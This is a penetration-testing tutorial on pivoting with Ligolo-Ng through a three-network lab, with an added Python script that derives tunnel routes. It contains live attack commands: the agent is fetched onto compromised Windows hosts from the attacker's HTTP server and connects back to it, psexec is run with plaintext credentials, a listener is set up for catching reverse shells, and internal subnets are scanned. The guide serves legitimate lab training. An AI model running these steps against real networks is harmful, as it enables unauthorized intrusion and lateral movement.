This guide walks through lateral movement with Ligolo-Ng, a pivoting tool written by Nicolas Chatelain. Ligolo-Ng builds tunnels over reverse TCP/TLS connections and exposes them through a tun interface on the attacking host, so ordinary tools reach the tunnel through normal routing instead of a SOCKS proxy wrapped in proxychains. The guide covers the tool's distinguishing features and then the practical side: single and double pivoting inside a lab network.
Download Ligolo-Ng:
Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases.
Table of Contents:
- Introduction to Ligolo-Ng
- Ligolo V/S Chisel
- Lab Setup
- Prerequisites
- Setting up Ligolo-Ng
- Single Pivoting
- Double Pivoting
Ligolo-Ng Overview:
Ligolo-Ng is a lightweight pivoting tool that lets penetration testers establish tunnels over reverse TCP/TLS connections and expose them through a tun interface. Both the proxy (run on the attacker) and the agent (run on the pivot host) are written in Go and ship as single static binaries, and the result behaves like a VPN: traffic is routed into the tun interface as raw IP packets rather than proxied connection by connection. Because of that, ICMP (ping), UDP, TCP SYN scans and DNS resolution all work across the tunnel, and the project reports throughput of up to 100 Mbit/s. One caveat before trusting nmap output: the proxy terminates TCP in its own user-space network stack and the agent opens real sockets on the far side, so fingerprint-based results such as OS detection describe the tunnel as much as the target. Setup overhead is small, since the attacking host needs only a tun interface and a few routes and no per-tool proxy configuration; the agent binary does have to be copied to and executed on each pivot host, which leaves an artifact on disk there.
Ligolo V/S Chisel:
- Ligolo-Ng is faster and more flexible than Chisel's SOCKS approach: traffic is routed through a tun interface, so tools run unmodified instead of through proxychains, and the proxy's certificate, listen address and per-agent listeners are all configurable.
- Both tools use a server/client model (proxy/agent in Ligolo-Ng). The difference is that Ligolo-Ng multiplexes each agent's traffic over its own reverse connection and lets you point the tun interface at any agent session, whereas Chisel exposes each hop as a separate SOCKS port that every tool must be told about.
- Ligolo-Ng saves maintenance because nothing per tool has to be configured on the attacking host; the agent binary still lands on the pivot host's disk, as Step 5 below shows.
- Because Ligolo-Ng tunnels at the IP layer, ICMP, UDP and raw TCP (SYN scans) all traverse it. Chisel carries TCP streams over an HTTP WebSocket and presents them as a SOCKS proxy, so ping and SYN scans do not work through it and UDP only works through explicitly configured per-port forwards.
Lab Setup
The lab used throughout has three networks. Kali (192.168.1.5) sits in Network A. A dual-homed domain controller, DC1, bridges Network A and Network B (192.168.148.0/24). A Windows 10 host in Network B (192.168.148.132) also has a leg in Network C (192.168.159.0/24), where a Metasploitable2 machine lives. Single pivoting reaches Network B through DC1; double pivoting reaches Network C through DC1 and then the Windows 10 host.
Prerequisites
Download the Ligolo-Ng 'agent' binary for Windows 64-bit and the 'proxy' binary for Linux 64-bit from the releases page, taking both from the same release so that agent and proxy speak the same protocol version.
The agent runs on the pivot (target) host; the proxy runs on the attacking machine (Kali Linux).
Setting up Ligolo-Ng
Step 1: With both binaries downloaded, prepare the tun interface the proxy will use. Check first whether it already exists with 'ifconfig' (or 'ip a'), then create it and bring it up. The 'user' argument must be the account the proxy will run as (root here), otherwise the proxy cannot open the device:
ip tuntap add user root mode tun ligolo
ip link set ligolo up
Verify that the 'ligolo' interface is now listed and UP with 'ifconfig' (or 'ip link show ligolo').
Step 2: Unpack the proxy archive:
tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
The proxy is the server side of Ligolo-Ng: agents connect back to it, and every pivoting action below is driven from its console. List its options with the help flag:
./proxy -h
Step 3: The options shown concern the TLS certificate the proxy presents to agents: -autocert obtains one from Let's Encrypt, -certfile/-keyfile use a certificate you supply, and -selfcert generates a self-signed certificate on the fly. The self-signed route is used here; the proxy then listens on 0.0.0.0:11601 by default (change it with -laddr). Because the certificate is self-signed, agents have to skip verification with -ignore-cert, which means an agent cannot tell the real proxy from an impostor answering on the same address; on a real engagement prefer -autocert or a certificate you control. Start the proxy:
./proxy -selfcert
Step 4: The proxy is now running on the attacking machine. Next, unpack the agent archive that will be delivered to the target:
unzip ligolo-ng_agent_0.5.1_windows_amd64.zip
To deliver agent.exe, serve the directory that contains it over HTTP (updog serves the current working directory, so run it from where agent.exe sits):
updog -p 80
Step 5: A shell on the first target was already obtained through netcat. From that shell, download the agent onto the target. -OutFile is used rather than the short -o, which PowerShell may reject as ambiguous, and the URL scheme is given explicitly:
cd Desktop
powershell wget http://192.168.1.5/agent.exe -OutFile agent.exe
dir
Step 6: The agent binary is now on the target. With the proxy still running on Kali, launch the agent and point it at the proxy; -ignore-cert is required because the proxy is using a self-signed certificate:
agent.exe -connect 192.168.1.5:11601 -ignore-cert
When the agent connects, the proxy console reports a new session. Run 'session' in the proxy console and pick '1' to select it, then run 'ifconfig' to list the interfaces of the agent host.
The output shows a second interface on this host with the IPv4 address 192.168.148.130/24: the pivot is dual-homed, and 192.168.148.0/24 is the internal network (Network B) that will be tunnelled into in the next steps.
Single Pivoting
In the single pivoting scenario, the aim is to reach Network B from the attacking machine in Network A, using the dual-homed host as the only hop.
A direct ping to a Network B address from Kali fails, because Kali has no route to 192.168.148.0/24 and its default gateway knows nothing about that subnet.
Open a new terminal on Kali, add a route for the internal subnet through the ligolo tun interface, and confirm that it is present:
ip route add 192.168.148.0/24 dev ligolo
ip route list
Back in the proxy console, with session 1 selected, bring the tunnel up with the 'start' command. From this point any packet Kali sends to 192.168.148.0/24 enters the tun interface and is forwarded by the agent on the pivot.
With the tunnel up, a netexec scan of the Network B subnet finds a second Windows 10 host in addition to DC1.
A ping to that host now succeeds where it failed before, and a full nmap scan can be run against it without any proxychains wrapper, since the traffic is routed rather than proxied.
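The route step above (and the identical step for Network C later) is easy to get wrong by hand: the agent's 'ifconfig' lists every interface, including the one on the attacker's own LAN, and routing that LAN into the tunnel would cut the agent connection. The script below is an added example, not code from the article or from the Ligolo-Ng project. It reads the proxy's 'ifconfig' output for the selected session from stdin, converts each IPv4 address to its network, drops any network the attacking host already reaches directly, and prints (or with --apply, as root, installs) the 'ip route add' commands, creating the tun device first if it is missing. The tun name 'ligolo', the proxy user 'root' and the sample SESSION1_IFCONFIG text are assumptions that mirror the lab; real output may draw the table differently, and the parser relies only on the 'IPv4 Address' label followed by CIDR notation.

```python
"""Derive and apply `ip route` entries for a Ligolo-ng pivot (added example)."""
import ipaddress
import re
import subprocess
import sys

TUN_IFACE = "ligolo"   # assumption: created with `ip tuntap add user root mode tun ligolo`
PROXY_USER = "root"    # assumption: the account the proxy binary runs as

# Constructed sample of what the proxy's `ifconfig` shows for session 1 (the dual-homed DC).
SESSION1_IFCONFIG = """\
┌──────────────┬───────────────────────┐
│ Interface 0  │                       │
│ Name         │ Ethernet0             │
│ IPv4 Address │ 192.168.1.10/24       │
├──────────────┼───────────────────────┤
│ Interface 1  │                       │
│ Name         │ Ethernet1             │
│ IPv4 Address │ 192.168.148.130/24    │
│ IPv6 Address │ fe80::1/64            │
├──────────────┼───────────────────────┤
│ Interface 2  │                       │
│ Name         │ Loopback              │
│ IPv4 Address │ 127.0.0.1/8           │
└──────────────┴───────────────────────┘
"""

# "IPv4 Address", any non-digit separator (table border, colon, spaces), then a.b.c.d/len
CIDR_RE = re.compile(r"IPv4 Address[^\d\n]*(\d{1,3}(?:\.\d{1,3}){3}/\d{1,2})")


def agent_networks(ifconfig_text):
    """Networks visible from the agent host, as IPv4Network objects.
    strict=False turns 192.168.148.130/24 into 192.168.148.0/24; loopback is skipped."""
    nets = set()
    for cidr in CIDR_RE.findall(ifconfig_text):
        iface = ipaddress.ip_interface(cidr)
        if not iface.ip.is_loopback:
            nets.add(iface.network)
    return nets


def routes_to_add(ifconfig_text, local_networks):
    """Agent networks that overlap nothing the attacker already routes directly.
    An overlap means the route is either unnecessary (our own LAN) or already installed."""
    local = [ipaddress.ip_network(n, strict=False) for n in local_networks]
    wanted = [n for n in agent_networks(ifconfig_text)
              if not any(n.overlaps(loc) for loc in local)]
    return sorted(wanted, key=lambda n: (int(n.network_address), n.prefixlen))


def route_commands(ifconfig_text, local_networks, tun=TUN_IFACE):
    """The exact `ip route add` lines to run on the attacking host."""
    return [f"ip route add {n} dev {tun}" for n in routes_to_add(ifconfig_text, local_networks)]


def local_ipv4_networks():
    """Destination prefixes in the attacker's own table (`ip -4 route`), as strings."""
    out = subprocess.run(["ip", "-4", "route"], capture_output=True, text=True, check=True).stdout
    nets = []
    for line in out.splitlines():
        fields = line.split()
        if not fields:
            continue
        try:
            nets.append(str(ipaddress.ip_network(fields[0], strict=False)))
        except ValueError:
            pass  # "default via ..." lines carry no prefix
    return nets


def ensure_tun(tun=TUN_IFACE, user=PROXY_USER):
    """Create the tun device if it is missing and bring it up (needs root)."""
    if subprocess.run(["ip", "link", "show", tun], capture_output=True).returncode != 0:
        subprocess.run(["ip", "tuntap", "add", "user", user, "mode", "tun", tun], check=True)
    subprocess.run(["ip", "link", "set", tun, "up"], check=True)


def main(argv):
    apply = "--apply" in argv
    text = SESSION1_IFCONFIG if sys.stdin.isatty() else sys.stdin.read()
    local = local_ipv4_networks() if apply else ["192.168.1.0/24"]  # constructed Kali LAN
    if apply:
        ensure_tun()
    for cmd in route_commands(text, local):
        print(cmd)
        if apply:
            subprocess.run(cmd.split(), check=True)


if __name__ == "__main__":
    main(sys.argv[1:])
```

Run it without arguments to see the commands for the constructed sample, or paste the real 'ifconfig' output on stdin (for example 'xclip -o | python3 ligolo_routes.py --apply' as root) to install the routes. The overlap check is what makes it safe to re-run after 'start': a prefix already on the ligolo interface is skipped instead of producing an "RTNETLINK answers: File exists" error.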
Double Pivoting
In double pivoting, the objective is to reach Network C from Network A, using a host in Network B as the second hop.
From a new terminal, use Impacket's psexec to get a shell on the Windows 10 host found at 192.168.148.132 (this connection already runs through the first tunnel), then download the agent onto it:
impacket-psexec administrator:123@192.168.148.132
cd c:\users\public
powershell wget http://192.168.1.5/agent.exe -OutFile agent.exe
dir
This download, and the connect-back in the next step, assume the Windows 10 host can reach Kali's 192.168.1.5 directly. If it cannot (the usual case for a host that only lives in Network B), expose the proxy through the first agent instead: with session 1 selected run 'listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601' (and forward port 80 the same way to deliver the file), then have the second agent connect to the first pivot's Network B address, 192.168.148.130:11601.
Now run the agent; since the proxy is still listening, a second session is established:
agent.exe -connect 192.168.1.5:11601 -ignore-cert
On the proxy console a second session, belonging to the Windows 10 host, now appears. Do not start a tunnel on it yet; the hand-over from session 1 is done in the listener step below.
Run 'session' to list the sessions, move with the arrow keys and select the newest one, session 2. Run 'ifconfig' there: it shows an additional interface with the address 192.168.159.130/24, so this host is also dual-homed, into Network C.
As before, pinging the new network from Kali fails: there is no route to 192.168.159.0/24 yet.
Add the Network C subnet to the routing table, again through the ligolo interface, and confirm it:
ip route add 192.168.159.0/24 dev ligolo
ip route list
With the route in place, add a listener on the first agent so that hosts in Network B can reach Kali through the pivot. 'listener_add' binds a port on the agent host of the currently selected session and forwards whatever connects to it to an address on the proxy side; here port 1234 on DC1 is forwarded to 127.0.0.1:4444 on Kali, which is useful for catching reverse shells from Network B (a netcat listener on 4444 receives them):
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
The proxy console confirms the listener ('listener_list' shows it). To tunnel into Network C, the tunnel has to move to session 2: with the single ligolo interface created in Step 1, only one session can own it at a time, so select session 1 and run 'stop', then select session 2 and run 'start'. Both routes keep working after the switch, because the Windows 10 agent sits in Network B as well as Network C, so 192.168.148.0/24 traffic now leaves through it instead of through DC1. Chaining sessions this way, each hop reached through the previous one, is what double pivoting means here.
The double pivot is verified with crackmapexec against the Network C subnet:
crackmapexec smb 192.168.159.0/24
It finds a Metasploitable2 host in Network C, which can then be pinged and scanned with nmap over the new tunnel, as the final image shows.